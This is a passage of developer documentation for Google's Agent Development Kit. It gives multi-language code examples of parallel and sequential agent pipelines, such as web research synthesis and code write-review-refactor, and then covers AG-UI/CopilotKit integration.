(Based on RenewableEnergyResearcher's findings)
[Synthesize and elaborate *only* on the renewable energy input summary provided above.]

### Electric Vehicle Findings
(Based on EVResearcher's findings)
[Synthesize and elaborate *only* on the EV input summary provided above.]

### Carbon Capture Findings
(Based on CarbonCaptureResearcher's findings)
[Synthesize and elaborate *only* on the carbon capture input summary provided above.]

### Overall Conclusion
[Provide a brief (1-2 sentence) concluding statement that connects *only* the findings presented above.]

Output *only* the structured report following this format. Do not include introductory or concluding phrases outside this structure, and strictly adhere to using only the provided input summary content.
""",
    description="Combines research findings from parallel agents into a structured, cited report, strictly grounded on provided inputs.",
    # No tools needed for merging
    # No output_key needed here, as its direct response is the final output of the sequence
)

# --- 4. Create the SequentialAgent (Orchestrates the overall flow) ---
# This is the main agent that will be run. It first executes the ParallelAgent
# to populate the state, and then executes the MergerAgent to produce the final output.
sequential_pipeline_agent = SequentialAgent(
    name="ResearchAndSynthesisPipeline",
    # Run parallel research first, then merge
    sub_agents=[parallel_research_agent, merger_agent],
    description="Coordinates parallel research and synthesizes the results."
)

root_agent = sequential_pipeline_agent
```

```typescript
// Part of agent.ts --> Follow https://google.github.io/adk-docs/get-started/quickstart/ to learn the setup

// --- 1. Define Researcher Sub-Agents (to run in parallel) ---
const researchTools = [GOOGLE_SEARCH];

// Researcher 1: Renewable Energy
const researcherAgent1 = new LlmAgent({
  name: "RenewableEnergyResearcher",
  model: GEMINI_MODEL,
  instruction: `You are an AI Research Assistant specializing in energy.
Research the latest advancements in 'renewable energy sources'.
Use the Google Search tool provided.
Summarize your key findings concisely (1-2 sentences).
Output *only* the summary.
`,
  description: "Researches renewable energy sources.",
  tools: researchTools,
  // Store result in state for the merger agent
  outputKey: "renewable_energy_result"
});

// Researcher 2: Electric Vehicles
const researcherAgent2 = new LlmAgent({
  name: "EVResearcher",
  model: GEMINI_MODEL,
  instruction: `You are an AI Research Assistant specializing in transportation.
Research the latest developments in 'electric vehicle technology'.
Use the Google Search tool provided.
Summarize your key findings concisely (1-2 sentences).
Output *only* the summary.
`, description: "Researches electric vehicle technology.", tools: researchTools, // Store result in state for the merger agent outputKey: "ev_technology_result" }); // Researcher 3: Carbon Capture const researcherAgent3 = new LlmAgent({ name: "CarbonCaptureResearcher", model: GEMINI_MODEL, instruction: `You are an AI Research Assistant specializing in climate solutions. Research the current state of 'carbon capture methods'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. `, description: "Researches carbon capture methods.", tools: researchTools, // Store result in state for the merger agent outputKey: "carbon_capture_result" }); // --- 2. Create the ParallelAgent (Runs researchers concurrently) --- // This agent orchestrates the concurrent execution of the researchers. // It finishes once all researchers have completed and stored their results in state. const parallelResearchAgent = new ParallelAgent({ name: "ParallelWebResearchAgent", subAgents: [researcherAgent1, researcherAgent2, researcherAgent3], description: "Runs multiple research agents in parallel to gather information." }); // --- 3. Define the Merger Agent (Runs *after* the parallel agents) --- // This agent takes the results stored in the session state by the parallel agents // and synthesizes them into a single, structured response with attributions. const mergerAgent = new LlmAgent({ name: "SynthesisAgent", model: GEMINI_MODEL, // Or potentially a more powerful model if needed for synthesis instruction: `You are an AI Assistant responsible for combining research findings into a structured report. Your primary task is to synthesize the following research summaries, clearly attributing findings to their source areas. Structure your response using headings for each topic. Ensure the report is coherent and integrates the key points smoothly. 
**Crucially: Your entire response MUST be grounded *exclusively* on the information provided in the 'Input Summaries' below. Do NOT add any external knowledge, facts, or details not present in these specific summaries.** **Input Summaries:** * **Renewable Energy:** {renewable_energy_result} * **Electric Vehicles:** {ev_technology_result} * **Carbon Capture:** {carbon_capture_result} **Output Format:** ## Summary of Recent Sustainable Technology Advancements ### Renewable Energy Findings (Based on RenewableEnergyResearcher's findings) [Synthesize and elaborate *only* on the renewable energy input summary provided above.] ### Electric Vehicle Findings (Based on EVResearcher's findings) [Synthesize and elaborate *only* on the EV input summary provided above.] ### Carbon Capture Findings (Based on CarbonCaptureResearcher's findings) [Synthesize and elaborate *only* on the carbon capture input summary provided above.] ### Overall Conclusion [Provide a brief (1-2 sentence) concluding statement that connects *only* the findings presented above.] Output *only* the structured report following this format. Do not include introductory or concluding phrases outside this structure, and strictly adhere to using only the provided input summary content. `, description: "Combines research findings from parallel agents into a structured, cited report, strictly grounded on provided inputs.", // No tools needed for merging // No output_key needed here, as its direct response is the final output of the sequence }); // --- 4. Create the SequentialAgent (Orchestrates the overall flow) --- // This is the main agent that will be run. It first executes the ParallelAgent // to populate the state, and then executes the MergerAgent to produce the final output. 
const rootAgent = new SequentialAgent({ name: "ResearchAndSynthesisPipeline", // Run parallel research first, then merge subAgents: [parallelResearchAgent, mergerAgent], description: "Coordinates parallel research and synthesizes the results." }); ``` ```go model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { return fmt.Errorf("failed to create model: %v", err) } // --- 1. Define Researcher Sub-Agents (to run in parallel) --- researcher1, err := llmagent.New(llmagent.Config{ Name: "RenewableEnergyResearcher", Model: model, Instruction: `You are an AI Research Assistant specializing in energy. Research the latest advancements in 'renewable energy sources'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary.`, Description: "Researches renewable energy sources.", OutputKey: "renewable_energy_result", }) if err != nil { return err } researcher2, err := llmagent.New(llmagent.Config{ Name: "EVResearcher", Model: model, Instruction: `You are an AI Research Assistant specializing in transportation. Research the latest developments in 'electric vehicle technology'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary.`, Description: "Researches electric vehicle technology.", OutputKey: "ev_technology_result", }) if err != nil { return err } researcher3, err := llmagent.New(llmagent.Config{ Name: "CarbonCaptureResearcher", Model: model, Instruction: `You are an AI Research Assistant specializing in climate solutions. Research the current state of 'carbon capture methods'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary.`, Description: "Researches carbon capture methods.", OutputKey: "carbon_capture_result", }) if err != nil { return err } // --- 2. 
Create the ParallelAgent (Runs researchers concurrently) --- parallelResearchAgent, err := parallelagent.New(parallelagent.Config{ AgentConfig: agent.Config{ Name: "ParallelWebResearchAgent", Description: "Runs multiple research agents in parallel to gather information.", SubAgents: []agent.Agent{researcher1, researcher2, researcher3}, }, }) if err != nil { return fmt.Errorf("failed to create parallel agent: %v", err) } // --- 3. Define the Merger Agent (Runs *after* the parallel agents) --- synthesisAgent, err := llmagent.New(llmagent.Config{ Name: "SynthesisAgent", Model: model, Instruction: `You are an AI Assistant responsible for combining research findings into a structured report. Your primary task is to synthesize the following research summaries, clearly attributing findings to their source areas. Structure your response using headings for each topic. Ensure the report is coherent and integrates the key points smoothly. **Crucially: Your entire response MUST be grounded *exclusively* on the information provided in the 'Input Summaries' below. Do NOT add any external knowledge, facts, or details not present in these specific summaries.** **Input Summaries:** * **Renewable Energy:** {renewable_energy_result} * **Electric Vehicles:** {ev_technology_result} * **Carbon Capture:** {carbon_capture_result} **Output Format:** ## Summary of Recent Sustainable Technology Advancements ### Renewable Energy Findings (Based on RenewableEnergyResearcher's findings) [Synthesize and elaborate *only* on the renewable energy input summary provided above.] ### Electric Vehicle Findings (Based on EVResearcher's findings) [Synthesize and elaborate *only* on the EV input summary provided above.] ### Carbon Capture Findings (Based on CarbonCaptureResearcher's findings) [Synthesize and elaborate *only* on the carbon capture input summary provided above.] ### Overall Conclusion [Provide a brief (1-2 sentence) concluding statement that connects *only* the findings presented above.] 
Output *only* the structured report following this format. Do not include introductory or concluding phrases outside this structure, and strictly adhere to using only the provided input summary content.`, Description: "Combines research findings from parallel agents into a structured, cited report, strictly grounded on provided inputs.", }) if err != nil { return fmt.Errorf("failed to create synthesis agent: %v", err) } // --- 4. Create the SequentialAgent (Orchestrates the overall flow) --- pipeline, err := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{ Name: "ResearchAndSynthesisPipeline", Description: "Coordinates parallel research and synthesizes the results.", SubAgents: []agent.Agent{parallelResearchAgent, synthesisAgent}, }, }) if err != nil { return fmt.Errorf("failed to create sequential agent pipeline: %v", err) } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.ParallelAgent; import com.google.adk.agents.SequentialAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.tools.GoogleSearchTool; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; public class ParallelResearchPipeline { private static final String APP_NAME = "parallel_research_app"; private static final String USER_ID = "research_user_01"; private static final String GEMINI_MODEL = "gemini-2.0-flash"; // Assume google_search is an instance of the GoogleSearchTool private static final GoogleSearchTool googleSearchTool = new GoogleSearchTool(); public static void main(String[] args) { String query = "Summarize recent sustainable tech advancements."; SequentialAgent sequentialPipelineAgent = initAgent(); runAgent(sequentialPipelineAgent, query); } public static SequentialAgent initAgent() { // --- 1. 
Define Researcher Sub-Agents (to run in parallel) --- // Researcher 1: Renewable Energy LlmAgent researcherAgent1 = LlmAgent.builder() .name("RenewableEnergyResearcher") .model(GEMINI_MODEL) .instruction(""" You are an AI Research Assistant specializing in energy. Research the latest advancements in 'renewable energy sources'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. """) .description("Researches renewable energy sources.") .tools(googleSearchTool) .outputKey("renewable_energy_result") // Store result in state .build(); // Researcher 2: Electric Vehicles LlmAgent researcherAgent2 = LlmAgent.builder() .name("EVResearcher") .model(GEMINI_MODEL) .instruction(""" You are an AI Research Assistant specializing in transportation. Research the latest developments in 'electric vehicle technology'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. """) .description("Researches electric vehicle technology.") .tools(googleSearchTool) .outputKey("ev_technology_result") // Store result in state .build(); // Researcher 3: Carbon Capture LlmAgent researcherAgent3 = LlmAgent.builder() .name("CarbonCaptureResearcher") .model(GEMINI_MODEL) .instruction(""" You are an AI Research Assistant specializing in climate solutions. Research the current state of 'carbon capture methods'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. """) .description("Researches carbon capture methods.") .tools(googleSearchTool) .outputKey("carbon_capture_result") // Store result in state .build(); // --- 2. Create the ParallelAgent (Runs researchers concurrently) --- // This agent orchestrates the concurrent execution of the researchers. // It finishes once all researchers have completed and stored their results in state. 
ParallelAgent parallelResearchAgent = ParallelAgent.builder() .name("ParallelWebResearchAgent") .subAgents(researcherAgent1, researcherAgent2, researcherAgent3) .description("Runs multiple research agents in parallel to gather information.") .build(); // --- 3. Define the Merger Agent (Runs *after* the parallel agents) --- // This agent takes the results stored in the session state by the parallel agents // and synthesizes them into a single, structured response with attributions. LlmAgent mergerAgent = LlmAgent.builder() .name("SynthesisAgent") .model(GEMINI_MODEL) .instruction( """ You are an AI Assistant responsible for combining research findings into a structured report. Your primary task is to synthesize the following research summaries, clearly attributing findings to their source areas. Structure your response using headings for each topic. Ensure the report is coherent and integrates the key points smoothly. **Crucially: Your entire response MUST be grounded *exclusively* on the information provided in the 'Input Summaries' below. Do NOT add any external knowledge, facts, or details not present in these specific summaries.** **Input Summaries:** * **Renewable Energy:** {renewable_energy_result} * **Electric Vehicles:** {ev_technology_result} * **Carbon Capture:** {carbon_capture_result} **Output Format:** ## Summary of Recent Sustainable Technology Advancements ### Renewable Energy Findings (Based on RenewableEnergyResearcher's findings) [Synthesize and elaborate *only* on the renewable energy input summary provided above.] ### Electric Vehicle Findings (Based on EVResearcher's findings) [Synthesize and elaborate *only* on the EV input summary provided above.] ### Carbon Capture Findings (Based on CarbonCaptureResearcher's findings) [Synthesize and elaborate *only* on the carbon capture input summary provided above.] ### Overall Conclusion [Provide a brief (1-2 sentence) concluding statement that connects *only* the findings presented above.] 
Output *only* the structured report following this format. Do not include introductory or concluding phrases outside this structure, and strictly adhere to using only the provided input summary content. """) .description( "Combines research findings from parallel agents into a structured, cited report, strictly grounded on provided inputs.") // No tools needed for merging // No output_key needed here, as its direct response is the final output of the sequence .build(); // --- 4. Create the SequentialAgent (Orchestrates the overall flow) --- // This is the main agent that will be run. It first executes the ParallelAgent // to populate the state, and then executes the MergerAgent to produce the final output. SequentialAgent sequentialPipelineAgent = SequentialAgent.builder() .name("ResearchAndSynthesisPipeline") // Run parallel research first, then merge .subAgents(parallelResearchAgent, mergerAgent) .description("Coordinates parallel research and synthesizes the results.") .build(); return sequentialPipelineAgent; } public static void runAgent(SequentialAgent sequentialPipelineAgent, String query) { // Create an InMemoryRunner InMemoryRunner runner = new InMemoryRunner(sequentialPipelineAgent, APP_NAME); // InMemoryRunner automatically creates a session service. 
// Create a session using the service
    Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet();
    Content userMessage = Content.fromParts(Part.fromText(query));

    // Run the agent
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.printf("Event Author: %s \n Event Response: %s \n\n\n", event.author(), event.stringifyContent());
          }
        });
  }
}
```

# Sequential agents

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.2.0

The `SequentialAgent` is a [workflow agent](https://google.github.io/adk-docs/agents/workflow-agents/index.md) that executes its sub-agents in the order they are specified in the list. Use the `SequentialAgent` when execution must occur in a fixed, strict order.

### Example

- You want to build an agent that can summarize any webpage, using two tools: `Get Page Contents` and `Summarize Page`. Because the agent must always call `Get Page Contents` before calling `Summarize Page` (you can't summarize from nothing!), you should build your agent using a `SequentialAgent`.

As with other [workflow agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md), the `SequentialAgent` is not powered by an LLM, and is thus deterministic in how it executes. That said, workflow agents are concerned only with the order of execution (here, in sequence), not with the internal logic of their steps; the tools or sub-agents of a workflow agent may or may not use LLMs.

### How it works

When the `SequentialAgent`'s `Run Async` method is called, it performs the following actions:

1. **Iteration:** It iterates through the sub-agents list in the order they were provided.
1. **Sub-Agent Execution:** For each sub-agent in the list, it calls the sub-agent's `Run Async` method.
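The two steps above can be sketched in plain Python. This is a minimal illustration only, not ADK's implementation: `ToyAgent`, `ToySequentialAgent`, and the shared `state` dictionary are hypothetical stand-ins, and the real `SequentialAgent` works with an `InvocationContext` and `Event` objects rather than a dict and strings.

```python
import asyncio
from typing import AsyncIterator


class ToyAgent:
    """Hypothetical stand-in for a sub-agent; not an ADK class."""

    def __init__(self, name: str, output_key: str):
        self.name = name
        self.output_key = output_key

    async def run_async(self, state: dict) -> AsyncIterator[str]:
        # Note which keys earlier agents already wrote, then store our own result.
        seen = sorted(state)
        state[self.output_key] = f"{self.name} saw {seen}"
        yield f"{self.name} finished"


class ToySequentialAgent:
    """Hypothetical sketch of the iteration and execution steps."""

    def __init__(self, sub_agents: list):
        self.sub_agents = sub_agents

    async def run_async(self, state: dict) -> AsyncIterator[str]:
        # Iteration: walk the sub-agents in the order they were provided.
        for sub_agent in self.sub_agents:
            # Sub-agent execution: run each one to completion and forward
            # its events before starting the next.
            async for event in sub_agent.run_async(state):
                yield event


async def run_pipeline() -> tuple:
    state = {}
    pipeline = ToySequentialAgent([
        ToyAgent("writer", "generated_code"),
        ToyAgent("reviewer", "review_comments"),
    ])
    events = [event async for event in pipeline.run_async(state)]
    return events, state


events, state = asyncio.run(run_pipeline())
```

Because each sub-agent finishes before the next one starts, the second toy agent can already read the key written by the first, which is the property the full example below relies on.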
### Full Example: Code Development Pipeline

Consider a simplified code development pipeline:

- **Code Writer Agent:** An LLM Agent that generates initial code based on a specification.
- **Code Reviewer Agent:** An LLM Agent that reviews the generated code for errors, style issues, and adherence to best practices. It receives the output of the Code Writer Agent.
- **Code Refactorer Agent:** An LLM Agent that takes the reviewed code (and the reviewer's comments) and refactors it to improve quality and address issues.

A `SequentialAgent` is perfect for this:

```py
SequentialAgent(sub_agents=[CodeWriterAgent, CodeReviewerAgent, CodeRefactorerAgent])
```

This ensures the code is written, *then* reviewed, and *finally* refactored, in a strict, dependable order. **The output from each sub-agent is passed to the next by storing it in state via [Output Key](https://google.github.io/adk-docs/agents/llm-agents/#structuring-data-input_schema-output_schema-output_key)**.

**Shared Invocation Context:** The `SequentialAgent` passes the same `InvocationContext` to each of its sub-agents. This means they all share the same session state, including the temporary (`temp:`) namespace, making it easy to pass data between steps within a single turn.

````py
from google.adk.agents.sequential_agent import SequentialAgent
from google.adk.agents.llm_agent import LlmAgent

# --- Constants ---
GEMINI_MODEL = "gemini-2.5-flash"

# --- 1. Define Sub-Agents for Each Pipeline Stage ---

# Code Writer Agent
# Takes the initial specification (from user query) and writes code.
code_writer_agent = LlmAgent(
    name="CodeWriterAgent",
    model=GEMINI_MODEL,
    instruction="""
You are a Python Code Generator.
Based *only* on the user's request, write Python code that fulfills the requirement.
Output *only* the complete Python code block, enclosed in triple backticks (```python ... ```).
Do not add any other text before or after the code block.
""", description="Writes initial Python code based on a specification.", output_key="generated_code" ) # Code Reviewer Agent # Takes the code generated by the previous agent (read from state) and provides feedback. code_reviewer_agent = LlmAgent( name="CodeReviewerAgent", model=GEMINI_MODEL, instruction=""" You are an expert Python Code Reviewer. Your task is to provide constructive feedback on the provided code. **Code to Review:** ```python {generated_code} ``` **Review Criteria:** 1. **Correctness:** Does the code work as intended? Are there logic errors? 2. **Readability:** Is the code clear and easy to understand? Follows PEP 8 style guidelines? 3. **Efficiency:** Is the code reasonably efficient? Any obvious performance bottlenecks? 4. **Edge Cases:** Does the code handle potential edge cases or invalid inputs gracefully? 5. **Best Practices:** Does the code follow common Python best practices? **Output:** Provide your feedback as a concise, bulleted list. Focus on the most important points for improvement. If the code is excellent and requires no changes, simply state: "No major issues found." Output *only* the review comments or the "No major issues" statement. """, description="Reviews code and provides feedback.", output_key="review_comments" ) # Code Refactorer Agent # Takes the original code and the review comments (read from state) and refactors the code. code_refactorer_agent = LlmAgent( name="CodeRefactorerAgent", model=GEMINI_MODEL, instruction=""" You are a Python Code Refactoring AI. Your goal is to improve the given Python code based on the provided review comments. **Original Code:** ```python {generated_code} ``` **Review Comments:** {review_comments} **Task:** Carefully apply the suggestions from the review comments to refactor the original code. If the review comments state "No major issues found," return the original code unchanged. Ensure the final code is complete, functional, and includes necessary imports and docstrings. 
**Output:** Output *only* the final, refactored Python code block, enclosed in triple backticks (```python ... ```). Do not add any other text before or after the code block. """, description="Refactors code based on review comments.", output_key="refactored_code" ) # --- 2. Create the SequentialAgent --- # This agent orchestrates the pipeline by running the sub_agents in order. code_pipeline_agent = SequentialAgent( name="CodePipelineAgent", sub_agents=[code_writer_agent, code_reviewer_agent, code_refactorer_agent], description="Executes a sequence of code writing, reviewing, and refactoring.", ) root_agent = code_pipeline_agent ```` ```typescript // Part of agent.ts --> Follow https://google.github.io/adk-docs/get-started/quickstart/ to learn the setup // --- 1. Define Sub-Agents for Each Pipeline Stage --- // Code Writer Agent // Takes the initial specification (from user query) and writes code. const codeWriterAgent = new LlmAgent({ name: "CodeWriterAgent", model: GEMINI_MODEL, instruction: `You are a Python Code Generator. Based *only* on the user's request, write Python code that fulfills the requirement. Output *only* the complete Python code block, enclosed in triple backticks (\`\`\`python ... \`\`\`). Do not add any other text before or after the code block. `, description: "Writes initial Python code based on a specification.", outputKey: "generated_code" // Stores output in state['generated_code'] }); // Code Reviewer Agent // Takes the code generated by the previous agent (read from state) and provides feedback. const codeReviewerAgent = new LlmAgent({ name: "CodeReviewerAgent", model: GEMINI_MODEL, instruction: `You are an expert Python Code Reviewer. Your task is to provide constructive feedback on the provided code. **Code to Review:** \`\`\`python {generated_code} \`\`\` **Review Criteria:** 1. **Correctness:** Does the code work as intended? Are there logic errors? 2. **Readability:** Is the code clear and easy to understand? 
Follows PEP 8 style guidelines? 3. **Efficiency:** Is the code reasonably efficient? Any obvious performance bottlenecks? 4. **Edge Cases:** Does the code handle potential edge cases or invalid inputs gracefully? 5. **Best Practices:** Does the code follow common Python best practices? **Output:** Provide your feedback as a concise, bulleted list. Focus on the most important points for improvement. If the code is excellent and requires no changes, simply state: "No major issues found." Output *only* the review comments or the "No major issues" statement. `, description: "Reviews code and provides feedback.", outputKey: "review_comments", // Stores output in state['review_comments'] }); // Code Refactorer Agent // Takes the original code and the review comments (read from state) and refactors the code. const codeRefactorerAgent = new LlmAgent({ name: "CodeRefactorerAgent", model: GEMINI_MODEL, instruction: `You are a Python Code Refactoring AI. Your goal is to improve the given Python code based on the provided review comments. **Original Code:** \`\`\`python {generated_code} \`\`\` **Review Comments:** {review_comments} **Task:** Carefully apply the suggestions from the review comments to refactor the original code. If the review comments state "No major issues found," return the original code unchanged. Ensure the final code is complete, functional, and includes necessary imports and docstrings. **Output:** Output *only* the final, refactored Python code block, enclosed in triple backticks (\`\`\`python ... \`\`\`). Do not add any other text before or after the code block. `, description: "Refactors code based on review comments.", outputKey: "refactored_code", // Stores output in state['refactored_code'] }); // --- 2. Create the SequentialAgent --- // This agent orchestrates the pipeline by running the sub_agents in order. 
const rootAgent = new SequentialAgent({ name: "CodePipelineAgent", subAgents: [codeWriterAgent, codeReviewerAgent, codeRefactorerAgent], description: "Executes a sequence of code writing, reviewing, and refactoring.", // The agents will run in the order provided: Writer -> Reviewer -> Refactorer }); ``` ```go model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { return fmt.Errorf("failed to create model: %v", err) } codeWriterAgent, err := llmagent.New(llmagent.Config{ Name: "CodeWriterAgent", Model: model, Description: "Writes initial Go code based on a specification.", Instruction: `You are a Go Code Generator. Based *only* on the user's request, write Go code that fulfills the requirement. Output *only* the complete Go code block, enclosed in triple backticks ('''go ... '''). Do not add any other text before or after the code block.`, OutputKey: "generated_code", }) if err != nil { return fmt.Errorf("failed to create code writer agent: %v", err) } codeReviewerAgent, err := llmagent.New(llmagent.Config{ Name: "CodeReviewerAgent", Model: model, Description: "Reviews code and provides feedback.", Instruction: `You are an expert Go Code Reviewer. Your task is to provide constructive feedback on the provided code. **Code to Review:** '''go {generated_code} ''' **Review Criteria:** 1. **Correctness:** Does the code work as intended? Are there logic errors? 2. **Readability:** Is the code clear and easy to understand? Follows Go style guidelines? 3. **Idiomatic Go:** Does the code use Go's features in a natural and standard way? 4. **Edge Cases:** Does the code handle potential edge cases or invalid inputs gracefully? 5. **Best Practices:** Does the code follow common Go best practices? **Output:** Provide your feedback as a concise, bulleted list. Focus on the most important points for improvement. If the code is excellent and requires no changes, simply state: "No major issues found." 
Output *only* the review comments or the "No major issues" statement.`, OutputKey: "review_comments", }) if err != nil { return fmt.Errorf("failed to create code reviewer agent: %v", err) } codeRefactorerAgent, err := llmagent.New(llmagent.Config{ Name: "CodeRefactorerAgent", Model: model, Description: "Refactors code based on review comments.", Instruction: `You are a Go Code Refactoring AI. Your goal is to improve the given Go code based on the provided review comments. **Original Code:** '''go {generated_code} ''' **Review Comments:** {review_comments} **Task:** Carefully apply the suggestions from the review comments to refactor the original code. If the review comments state "No major issues found," return the original code unchanged. Ensure the final code is complete, functional, and includes necessary imports. **Output:** Output *only* the final, refactored Go code block, enclosed in triple backticks ('''go ... '''). Do not add any other text before or after the code block.`, OutputKey: "refactored_code", }) if err != nil { return fmt.Errorf("failed to create code refactorer agent: %v", err) } codePipelineAgent, err := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{ Name: appName, Description: "Executes a sequence of code writing, reviewing, and refactoring.", SubAgents: []agent.Agent{ codeWriterAgent, codeReviewerAgent, codeRefactorerAgent, }, }, }) if err != nil { return fmt.Errorf("failed to create sequential agent: %v", err) } ``` ````java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.SequentialAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; public class SequentialAgentExample { private static final String APP_NAME = "CodePipelineAgent"; private static final String USER_ID = "test_user_456"; private static final 
String MODEL_NAME = "gemini-2.0-flash";

  public static void main(String[] args) {
    SequentialAgentExample sequentialAgentExample = new SequentialAgentExample();
    sequentialAgentExample.runAgent(
        "Write a Java function to calculate the factorial of a number.");
  }

  public void runAgent(String prompt) {

    LlmAgent codeWriterAgent =
        LlmAgent.builder()
            .model(MODEL_NAME)
            .name("CodeWriterAgent")
            .description("Writes initial Java code based on a specification.")
            .instruction(
                """
                You are a Java Code Generator.
                Based *only* on the user's request, write Java code that fulfills the requirement.
                Output *only* the complete Java code block, enclosed in triple backticks (```java ... ```).
                Do not add any other text before or after the code block.
                """)
            .outputKey("generated_code")
            .build();

    LlmAgent codeReviewerAgent =
        LlmAgent.builder()
            .model(MODEL_NAME)
            .name("CodeReviewerAgent")
            .description("Reviews code and provides feedback.")
            .instruction(
                """
                You are an expert Java Code Reviewer.
                Your task is to provide constructive feedback on the provided code.

                **Code to Review:**
                ```java
                {generated_code}
                ```

                **Review Criteria:**
                1. **Correctness:** Does the code work as intended? Are there logic errors?
                2. **Readability:** Is the code clear and easy to understand? Follows Java style guidelines?
                3. **Efficiency:** Is the code reasonably efficient? Any obvious performance bottlenecks?
                4. **Edge Cases:** Does the code handle potential edge cases or invalid inputs gracefully?
                5. **Best Practices:** Does the code follow common Java best practices?

                **Output:**
                Provide your feedback as a concise, bulleted list. Focus on the most important points for improvement.
                If the code is excellent and requires no changes, simply state: "No major issues found."
                Output *only* the review comments or the "No major issues" statement.
                """)
            .outputKey("review_comments")
            .build();

    LlmAgent codeRefactorerAgent =
        LlmAgent.builder()
            .model(MODEL_NAME)
            .name("CodeRefactorerAgent")
            .description("Refactors code based on review comments.")
            .instruction(
                """
                You are a Java Code Refactoring AI.
                Your goal is to improve the given Java code based on the provided review comments.

                **Original Code:**
                ```java
                {generated_code}
                ```

                **Review Comments:**
                {review_comments}

                **Task:**
                Carefully apply the suggestions from the review comments to refactor the original code.
                If the review comments state "No major issues found," return the original code unchanged.
                Ensure the final code is complete, functional, and includes necessary imports and docstrings.

                **Output:**
                Output *only* the final, refactored Java code block, enclosed in triple backticks (```java ... ```).
                Do not add any other text before or after the code block.
                """)
            .outputKey("refactored_code")
            .build();

    SequentialAgent codePipelineAgent =
        SequentialAgent.builder()
            .name(APP_NAME)
            .description("Executes a sequence of code writing, reviewing, and refactoring.")
            // The agents will run in the order provided: Writer -> Reviewer -> Refactorer
            .subAgents(codeWriterAgent, codeReviewerAgent, codeRefactorerAgent)
            .build();

    // Create an InMemoryRunner
    InMemoryRunner runner = new InMemoryRunner(codePipelineAgent, APP_NAME);

    // InMemoryRunner automatically creates a session service. Create a session using the service
    Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet();
    Content userMessage = Content.fromParts(Part.fromText(prompt));

    // Run the agent; the stream is typed so the lambda below can call Event methods
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.println(event.stringifyContent());
          }
        });
  }
}
````

# Tools and Integrations for Agents

Check out the following pre-built tools and integrations that you can use with ADK agents.
For information on building custom tools, see [Custom Tools](/adk-docs/tools-custom/). For information on submitting integrations to the catalog, see the [Contribution Guide for Integrations](https://github.com/google/adk-docs/blob/main/CONTRIBUTING.md#integrations). # AG-UI user interface for ADK Supported in ADK: Python, TypeScript, Go, Java Turn your ADK agents into full-featured applications with rich, responsive UIs. [AG-UI](https://docs.ag-ui.com/) is an open protocol that handles streaming events, client state, and bi-directional communication between your agents and users. [AG-UI](https://github.com/ag-ui-protocol/ag-ui) provides a consistent interface to empower rich clients across technology stacks, from mobile to the web and even the command line. There are a number of different clients that support AG-UI: - [CopilotKit](https://copilotkit.ai) provides tooling and components to tightly integrate your agent with web applications - Clients for [Kotlin](https://github.com/ag-ui-protocol/ag-ui/tree/main/sdks/community/kotlin), [Java](https://github.com/ag-ui-protocol/ag-ui/tree/main/sdks/community/java), [Go](https://github.com/ag-ui-protocol/ag-ui/tree/main/sdks/community/go/example/client), and [CLI implementations](https://github.com/ag-ui-protocol/ag-ui/tree/main/apps/client-cli-example/src) in TypeScript This tutorial uses CopilotKit to create a sample app backed by an ADK agent that demonstrates some of the features supported by AG-UI. ## Quickstart To get started, let's create a sample application with an ADK agent and a simple web client: 1. Create the app: ```bash npx copilotkit@latest create -f adk ``` 1. Set your Google API key: ```bash export GOOGLE_API_KEY="your-api-key" ``` 1.
Install dependencies and run: ```bash npm install && npm run dev ``` This starts two servers: - **http://localhost:3000** - The web UI (open this in your browser) - **http://localhost:8000** - The ADK agent API (backend only) Open http://localhost:3000 in your browser to chat with your agent. ## Features ### Chat Chat is a familiar interface for exposing your agent, and AG-UI handles streaming messages between your users and agents: src/app/page.tsx ```tsx ``` Learn more about the chat UI [in the CopilotKit docs](https://docs.copilotkit.ai/adk/agentic-chat-ui). ### Generative UI AG-UI lets you share tool information with a Generative UI so that it can be displayed to users: src/app/page.tsx ```tsx useRenderToolCall( { name: "get_weather", description: "Get the weather for a given location.", parameters: [{ name: "location", type: "string", required: true }], render: ({ args }) => { return ; }, }, [themeColor], ); ``` Learn more about Generative UI [in the CopilotKit docs](https://docs.copilotkit.ai/adk/generative-ui). ### Shared State ADK agents can be stateful, and synchronizing that state between your agents and your UIs enables powerful and fluid user experiences. State can be synchronized both ways so agents are automatically aware of changes made by your user or other parts of your application: src/app/page.tsx ```tsx const { state, setState } = useCoAgent({ name: "my_agent", initialState: { proverbs: [ "A journey of a thousand miles begins with a single step.", ], }, }) ``` Learn more about shared state [in the CopilotKit docs](https://docs.copilotkit.ai/adk/shared-state). ## Resources To see what other features you can build into your UI with AG-UI, refer to the CopilotKit docs: - [Agentic Generative UI](https://docs.copilotkit.ai/adk/generative-ui/agentic) - [Human in the Loop](https://docs.copilotkit.ai/adk/human-in-the-loop) - [Frontend 